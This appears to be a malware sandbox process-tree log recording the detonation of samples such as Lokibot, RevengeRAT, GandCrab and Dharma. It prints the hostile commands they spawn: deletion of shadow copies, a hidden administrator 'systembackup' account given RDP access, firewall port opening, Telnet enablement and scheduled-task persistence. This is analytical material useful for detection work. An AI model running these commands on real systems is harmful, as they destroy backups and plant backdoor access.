-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST2⤵
- Scheduled Task/Job: Scheduled Task
PID:1996 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2072
-
-
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Stealer\Lokibot.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Stealer\Lokibot.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:988 -
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Stealer\Lokibot.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Stealer\Lokibot.exe"2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3616
-
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1988 -
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4716 -
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:4408
-
-
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1676
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2116
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1156
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:920
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Spyware\AgentTesla.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Spyware\AgentTesla.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3664
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Spyware\butterflyondesktop.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Spyware\butterflyondesktop.exe"1⤵
- Executes dropped EXE
PID:1596 -
C:\Users\Admin\AppData\Local\Temp\is-KC2QD.tmp\butterflyondesktop.tmp"C:\Users\Admin\AppData\Local\Temp\is-KC2QD.tmp\butterflyondesktop.tmp" /SL5="$30370,2719719,54272,C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Spyware\butterflyondesktop.exe"2⤵
- Executes dropped EXE
PID:3060
-
-
C:\Programdata\RealtekHD\taskhostw.exe"C:\Programdata\RealtekHD\taskhostw.exe"1⤵
- Executes dropped EXE
PID:696
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Spyware\The Worst Of All!!!!!!\BonziBUDDY!!!!!!.txt1⤵PID:2836
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\RAT\RevengeRAT.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\RAT\RevengeRAT.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:568 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"2⤵
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4696 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵PID:2416
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wg6lto3j.cmdline"3⤵PID:2348
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC9E5.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4F71F9CD18384F8A88D15865B40D78F.TMP"4⤵PID:5108
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\bro_t9iw.cmdline"3⤵PID:4112
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA53.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB11A7E5E10494A7A8923FF4CDCCD31F1.TMP"4⤵PID:4148
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ca2z2dkm.cmdline"3⤵PID:1304
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCAB0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc306DBAF15D704160BD8E3676CBE876BF.TMP"4⤵PID:1520
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hlfo7odi.cmdline"3⤵
- System Location Discovery: System Language Discovery
PID:1200 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCAFF.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcBAA63F6DD3134B428F6CF0EAAE0ABAA.TMP"4⤵PID:3920
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\k421rf6p.cmdline"3⤵PID:1208
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCBAA.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE25A95BD455E4435A71C99AA64D5CAE.TMP"4⤵PID:1792
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ajwuvdx7.cmdline"3⤵PID:648
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCCE3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC0FB7849B2E4B7192814AD0FE54D9D.TMP"4⤵PID:4188
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\merkzuty.cmdline"3⤵PID:2844
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCDBE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD8F82C40D06A41EF8EF862C0D9AB770.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:2636
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4324 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"4⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1792 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"5⤵PID:2912
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\e0yingzg.cmdline"5⤵PID:12336
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6645.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc47584DA4BBF0438193A72A9098303F4D.TMP"6⤵PID:14192
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:3512
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\yeblswn5.cmdline"5⤵PID:21048
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\icc0wq8i.cmdline"5⤵PID:17424
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB35B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc51DAC247624246D7ADC6A5E199C4823.TMP"6⤵PID:7564
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wia90uaw.cmdline"5⤵PID:10796
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBF51.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc3796EBAAF7A74218AC15C7BDBA81885C.TMP"6⤵
- System Location Discovery: System Language Discovery
PID:18224
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\gntipdz1.cmdline"5⤵PID:15664
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC51E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc8CE104EF3AEC4CCEA6F8BF9C49DB95D9.TMP"6⤵PID:14608
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hspzq_le.cmdline"5⤵PID:14596
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC6A4.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEA36116687DD44108C762BA2CB51092.TMP"6⤵PID:19244
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\azgmslnm.cmdline"5⤵PID:7080
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC770.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2F8A032A40A849CBA75780F8F2C81C66.TMP"6⤵PID:19076
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vrb1b4ot.cmdline"5⤵
- System Location Discovery: System Language Discovery
PID:18996 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC81B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA4D04F521D3C4864AB440E01297A5CA.TMP"6⤵PID:18788
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\sh2evojx.cmdline"5⤵
- System Location Discovery: System Language Discovery
PID:18596 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC8C7.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcBB953B924E3B4FE483ADB133B66B111.TMP"6⤵PID:18388
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\n-fwkoqz.cmdline"5⤵PID:18196
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC944.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5CB36213AFDE4406882CF5E062F5A82E.TMP"6⤵PID:17932
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tcn7vzlp.cmdline"5⤵PID:17784
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA00.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc71ACA21B3A45FBB92C8E048C54153.TMP"6⤵PID:17448
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hzomrdjv.cmdline"5⤵PID:17064
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\-vf6kxpv.cmdline"5⤵PID:15960
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCB19.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD0359097C99945F88FBB82A0D21A196C.TMP"6⤵PID:15092
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\r4p62mp-.cmdline"5⤵PID:14416
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF9D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc119ACEB61FA4464EAF3A59A4A952E29E.TMP"6⤵PID:15104
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qbxw1c8u.cmdline"5⤵PID:15996
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD0C6.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc46F8C613E72C4498848497ADE9A1511.TMP"6⤵PID:16736
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\0eghttxx.cmdline"5⤵PID:17528
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD29B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2C111A32C6B14E7195783E6095572BDD.TMP"6⤵PID:6472
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\fc_t3eui.cmdline"5⤵PID:10220
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qxbh7z2h.cmdline"5⤵
- System Location Discovery: System Language Discovery
PID:10632 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES378F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc24C24AAC458B41329B607B922155B6E6.TMP"6⤵PID:9972
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dlhwxyhz.cmdline"5⤵PID:9816
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3AAC.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc3A6134D4CD9340908D5D9646CC841729.TMP"6⤵PID:9460
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\s6opva25.cmdline"5⤵PID:7896
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3CAF.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1028D4C694074FABA12378EC668EC5F3.TMP"6⤵PID:9632
-
-
-
-
-
-
C:\Programdata\RealtekHD\taskhostw.exe"C:\Programdata\RealtekHD\taskhostw.exe"1⤵
- Executes dropped EXE
PID:3900
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\NoMoreRansom.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\NoMoreRansom.exe"1⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2440
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\Krotten.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\Krotten.exe"1⤵
- Disables RegEdit via registry modification
- Executes dropped EXE
- Adds Run key to start application
- Modifies WinLogon
- Modifies Control Panel
- Modifies Internet Explorer settings
- Modifies Internet Explorer start page
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:2984
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\InfinityCrypt.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\InfinityCrypt.exe"1⤵
- Drops startup file
- Executes dropped EXE
- Drops file in Program Files directory
- Checks processor information in registry
PID:4880
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\GandCrab.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\GandCrab.exe"1⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Checks processor information in registry
PID:1924 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet2⤵PID:5928
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5976
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 16002⤵
- Program crash
PID:21456
-
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\Fantom.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\Fantom.exe"1⤵
- Drops file in Drivers directory
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4656 -
C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"2⤵
- Executes dropped EXE
PID:15548
-
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\Dharma.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\Dharma.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1892 -
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\ac\nc123.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\ac\nc123.exe"2⤵
- Executes dropped EXE
PID:6028 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:5664
-
-
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\ac\mssql.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\ac\mssql.exe"2⤵
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5184
-
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\ac\mssql2.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\ac\mssql2.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\ac\Shadow.bat" "2⤵PID:2284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\ac\systembackup.bat" "2⤵PID:6020
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="3⤵
- System Location Discovery: System Language Discovery
PID:5644 -
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6072
-
-
C:\Windows\SysWOW64\find.exeFind "="4⤵PID:6052
-
-
-
C:\Windows\SysWOW64\net.exenet user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"3⤵PID:5952
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"4⤵PID:5976
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators systembackup /add3⤵PID:6040
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators systembackup /add4⤵PID:6068
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="3⤵PID:6092
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value4⤵PID:6104
-
-
C:\Windows\SysWOW64\find.exeFind "="4⤵PID:6140
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" systembackup /add3⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:376 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add4⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:3652
-
-
-
C:\Windows\SysWOW64\net.exenet accounts /forcelogoff:no /maxpwage:unlimited3⤵PID:5984
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited4⤵
- System Location Discovery: System Language Discovery
PID:5896
-
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f3⤵PID:2124
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f3⤵PID:5204
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f3⤵
- System Location Discovery: System Language Discovery
PID:2116
-
-
C:\Windows\SysWOW64\attrib.exeattrib C:\users\systembackup +r +a +s +h3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5144
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening TCP 3389 "Remote Desktop"3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4080
-
-
C:\Windows\SysWOW64\sc.exesc config tlntsvr start=auto3⤵
- Launches sc.exe
PID:1488
-
-
C:\Windows\SysWOW64\net.exenet start Telnet3⤵PID:4464
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start Telnet4⤵PID:4032
-
-
-
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\ac\EVER\SearchHost.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\ac\EVER\SearchHost.exe"2⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5488
-
-
